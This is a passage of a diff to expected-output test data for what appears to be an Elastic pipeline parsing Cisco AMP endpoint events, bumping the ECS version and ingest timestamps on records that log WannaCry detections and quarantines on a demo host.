"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526287\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -1511,7 +1511,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1531,7 +1531,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843565954Z", + "ingested": "2021-09-13T18:07:04.510361876Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526286\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -1586,7 +1586,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1606,7 +1606,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843567900Z", + "ingested": "2021-09-13T18:07:04.510363767Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558988\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -1661,7 +1661,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1681,7 +1681,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843569770Z", + "ingested": "2021-09-13T18:07:04.510365640Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558989\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -1736,7 +1736,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1756,7 +1756,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843571678Z", + "ingested": "2021-09-13T18:07:04.510367543Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558987\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -1811,7 +1811,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1831,7 +1831,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843573820Z", + "ingested": "2021-09-13T18:07:04.510369477Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558986\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -1886,7 +1886,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1906,7 +1906,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843575704Z", + "ingested": "2021-09-13T18:07:04.510371353Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558985\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -1961,7 +1961,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1981,7 +1981,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843595495Z", + "ingested": "2021-09-13T18:07:04.510373257Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558984\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -2045,7 +2045,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -2075,7 +2075,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843599818Z", + "ingested": "2021-09-13T18:07:04.510375122Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":461000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.2CA2D550E6-100.SBX.VIOC\",\"detection_id\":\"6419303574240493599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"taskse.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\taskse.exe\",\"identity\":{\"sha256\":\"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", "kind": "alert", "action": "Threat Detected", @@ -2141,7 +2141,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -2171,7 +2171,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843601745Z", + "ingested": "2021-09-13T18:07:04.510376987Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":430000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.4A468603FD.04426d77.auto.Talos\",\"detection_id\":\"6419303574240493597\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"taskdl.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\taskdl.exe\",\"identity\":{\"sha256\":\"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", "kind": "alert", "action": "Threat Detected", @@ -2239,7 +2239,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -2271,7 +2271,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843603663Z", + "ingested": "2021-09-13T18:07:04.510378867Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":327000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419303574240493595\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", "kind": "alert", "action": "Threat Detected", @@ -2339,7 +2339,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -2371,7 +2371,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843605546Z", + "ingested": "2021-09-13T18:07:04.510380745Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":313000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419303574240493594\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"@WanaDecryptor@.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\@WanaDecryptor@.exe\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", "kind": "alert", "action": "Threat Detected", @@ -2428,7 +2428,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -2448,7 +2448,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843607426Z", + "ingested": "2021-09-13T18:07:04.510382667Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303574240493595\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "kind": "alert", "action": "Threat Quarantined", @@ -2499,7 +2499,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -2519,7 +2519,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843609310Z", + "ingested": "2021-09-13T18:07:04.510384507Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303574240493594\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "kind": "alert", "action": "Threat Quarantined", @@ -2570,7 +2570,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -2590,7 +2590,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843611171Z", + "ingested": "2021-09-13T18:07:04.510386359Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303569945526290\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d\"}}}}", "kind": "alert", "action": "Threat Quarantined", @@ -2641,7 +2641,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -2661,7 +2661,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843613053Z", + "ingested": "2021-09-13T18:07:04.510388218Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303569945526289\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79\"}}}}", "kind": "alert", "action": "Threat Quarantined", @@ -2712,7 +2712,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -2732,7 +2732,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843615119Z", + "ingested": "2021-09-13T18:07:04.510390180Z", "original": 